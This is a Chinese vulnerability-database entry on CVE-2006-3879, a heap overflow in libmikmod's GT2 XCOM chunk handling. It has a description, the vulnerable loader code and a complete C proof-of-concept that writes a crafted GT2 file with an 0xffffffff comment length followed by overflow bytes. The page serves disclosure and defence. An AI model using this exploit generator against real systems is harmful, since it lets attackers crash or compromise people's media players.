Libmikmod XCOM处理器远程堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110680 漏洞类型 数字错误
发布时间 2006-07-25 更新时间 2007-03-08
CVE编号 CVE-2006-3879 CNNVD-ID CNNVD-200607-455
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2073
https://www.securityfocus.com/bid/19134
https://cxsecurity.com/issue/WLB-2006070125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-455
|漏洞详情
libmikmod是Mikmod所使用的函数库,主要用于播放各种类型的音频模块。libmikmod在处理XCOM对象时存在堆溢出漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。在处理XCOM块时libmikmod读取了用于指定标注大小的32位数字,然后分配等于该大小加1的内存,以容纳标注末尾可能的空字节。因此如果攻击者使用了0xffffffff值(0xffffffff+1=0)的话,函数库就可能分配0字节的内存。然后在试图读取大小值所指定的内存数量时,就会导致堆溢出。loaders/load_gt2.c中的漏洞代码:GT_CHUNK*loadChunk(void)...if(!memcmp(new_chunk,"XCOM",4)){new_chunk->xcom.chunk_size=_mm_read_M_ULONG(modreader);new_chunk->xcom.comment_len=_mm_read_M_ULONG(modreader);new_chunk->xcom.comment=MikMod_malloc(new_chunk->xcom.comment_len+1);_mm_read_UBYTES(new_chunk->xcom.comment,new_chunk->xcom.comment_len,modreader);returnnew_chunk;}...
|漏洞EXP
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>



#define VER         "0.1"



#define cpy(x,y)    strncpy(x, y, sizeof(x));
void fwi08(FILE *fd, int num);
void fwi16(FILE *fd, int num);
void fwi32(FILE *fd, int num);
void fwstr(FILE *fd, uint8_t *str);
void fwmem(FILE *fd, uint8_t *data, int size);
void std_err(void);



#pragma pack(1)

typedef struct {
    uint8_t     gt2[3];
    uint8_t     version;
    uint32_t    chunk_size;
    uint8_t     module[32];
    uint8_t     comments[160];
    uint8_t     date_day;
    uint8_t     date_month;
    uint16_t    date_year;
    uint8_t     tracker[24];
    uint16_t    speed;
    uint16_t    tempo;
    uint16_t    volume;
    uint16_t    voices;
    /* voices * 2 */
} gt2_t;

#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    gt2_t   gt2;
    int     i;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <output_file.GT2>\n"
            "\n", argv[0]);
        exit(1);
    }

    fname = argv[1];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    gt2.gt2[0]        = 'G';
    gt2.gt2[1]        = 'T';
    gt2.gt2[2]        = '2';
    gt2.version       = 4;
    gt2.chunk_size    = 0;                  // unused
    cpy(gt2.module,   "module_name");
    cpy(gt2.comments, "author");
    gt2.date_day      = 1;
    gt2.date_month    = 1;
    gt2.date_year     = 2006;
    cpy(gt2.tracker,  "tracker");
    gt2.speed         = 6;
    gt2.tempo         = 300;
    gt2.volume        = 0;
    gt2.voices        = 0;

    printf("- write GT2 header\n");
    fwrite(&gt2, sizeof(gt2), 1, fd);
    for(i = 0; i < gt2.voices; i++) fwi16(fd, 0);

    printf("- build the XCOM header for exploiting the heap overflow\n");
    fwmem(fd, "XCOM", 4);
    fwi32(fd, 0);                           // unused
    fwi32(fd, 0xffffffff);                  // bug here, 0xffffffff + 1 = 0
    fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");

    fclose(fd);
    printf("- finished\n");
    return(0);
}



void fwi08(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
}



void fwi16(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
}



void fwi32(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
    fputc((num >> 16) & 0xff, fd);
    fputc((num >> 24) & 0xff, fd);
}



void fwstr(FILE *fd, uint8_t *str) {
    fputs(str, fd);
}



void fwmem(FILE *fd, uint8_t *data, int size) {
    fwrite(data, size, 1, fd);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2006-07-25]
|受影响的产品
libmikmod libmikmod 3.2.2
|参考资料

来源:BID
名称:19134
链接:http://www.securityfocus.com/bid/19134
来源:BUGTRAQ
名称:20060724HeapoverflowintheGT2loaderoflibmikmod3.2.2
链接:http://www.securityfocus.com/archive/1/archive/1/441006/100/0/threaded
来源:VUPEN
名称:ADV-2006-2967
链接:http://www.frsirt.com/english/advisories/2006/2967
来源:SECUNIA
名称:21196
链接:http://secunia.com/advisories/21196
来源:MISC
链接:http://aluigi.org/poc/lmmgt2ho.zip
来源:MISC
链接:http://aluigi.altervista.org/adv/lmmgt2ho-adv.txt
来源:SREASON
名称:1288
链接:http://securityreason.com/securityalert/1288